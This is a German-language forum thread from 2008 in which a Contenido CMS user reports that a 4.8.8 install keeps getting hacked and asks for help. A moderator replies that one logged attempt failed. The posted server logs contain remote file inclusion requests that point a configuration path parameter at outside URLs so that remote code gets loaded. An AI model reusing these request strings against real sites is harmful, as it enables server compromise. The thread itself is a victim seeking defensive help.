Werde ständig gehackt 4.8.8

Gesperrt
speedmaster
Beiträge: 59
Registriert: Mi 18. Apr 2007, 18:43
Kontaktdaten:
Kontaktdaten von speedmaster

Werde ständig gehackt 4.8.8

Beitrag von speedmaster » Di 25. Nov 2008, 16:26

Hallo zusammen,

meine Contenido Installation (4.8.8)wird ständig über die contenido/includes/include.newsletter_jobs_subnav.php gehackt.
Ist dies eine bekannte Sicherheitslücke?

Das ganze sieht in meinem logfile so aus:

Code: Alles auswählen

74.Red-88-2-188.staticIP.rima-tde.net - - [19/Nov/2008:02:47:32 +0100] "GET /_de/kommunikationstechnik//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 403 282 "-" "Mozilla/5.0"
Wie kann ich mich davor schützen?
Nach oben
Dodger77
Beiträge: 3626
Registriert: Di 12. Okt 2004, 20:00
Wohnort: Voerde (Niederrhein)
Kontaktdaten:
Kontaktdaten von Dodger77

Beitrag von Dodger77 » Di 25. Nov 2008, 16:42

Sofern wirklich die 4.8.8 im Einsatz ist, handelt es sich dabei nur um einen Hackversuch, der nicht erfolgreich sein dürfte.
Nach oben
speedmaster
Beiträge: 59
Registriert: Mi 18. Apr 2007, 18:43
Kontaktdaten:
Kontaktdaten von speedmaster

Beitrag von speedmaster » Di 25. Nov 2008, 16:48

Hallo,

ja es handelt sich um eine komplette Neuinstalltion der 4.8.8.
Diese wird immer wieder gehackt. Es werden vom Angreifer .htaccess Dateien angelegt, die die URLs umschreiben, und somit einen Zugriff auf die Seite und den Adminbereich nicht mehr zulassen.
Nach oben
Dodger77
Beiträge: 3626
Registriert: Di 12. Okt 2004, 20:00
Wohnort: Voerde (Niederrhein)
Kontaktdaten:
Kontaktdaten von Dodger77

Beitrag von Dodger77 » Di 25. Nov 2008, 16:56

Das mag evtl. ja so sein, das die Installation gehackt wird. Allerdings ist der von dir gepostete Angriffsversuch nicht erfolgreich. Die Datei "contenido/includes/include.newsletter_jobs_subnav.php" aus der 4.8.8 bricht bei diesem Zugriff die Verarbeitung komplett ab. Daraus resultiert auch der Statuscode 403. Wenn Angriffe erfolgreich sind, dann werden die über andere Wege laufen müssen.

Was bietet das Logfile denn sonst noch so?

P.S. Ach so: verschoben.
Nach oben
speedmaster
Beiträge: 59
Registriert: Mi 18. Apr 2007, 18:43
Kontaktdaten:
Kontaktdaten von speedmaster

Beitrag von speedmaster » Di 25. Nov 2008, 17:04

Hier sind noch welche ohne Statuscode 403.

Code: Alles auswählen

74.Red-88-2-188.staticIP.rima-tde.net - - [19/Nov/2008:02:36:19 +0100] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 200 12 "-" "Mozilla/5.0"

swifttrim.com - - [19/Nov/2008:04:08:35 +0100] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kiliclub.com/temp/sobi/copyright.txt?? HTTP/1.1" 200 12 "-" "Mozilla/5.0"
Und was könnte das sein?

Code: Alles auswählen

proxy2.imos.net - - [19/Nov/2008:08:02:36 +0100] "GET /cms/upload/logos/logo_home_b.jpg HTTP/1.0" 304 - "http://www.domain.tld/startseite/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
Nach oben
Gesperrt

Zurück zu „Allgemeine Themen“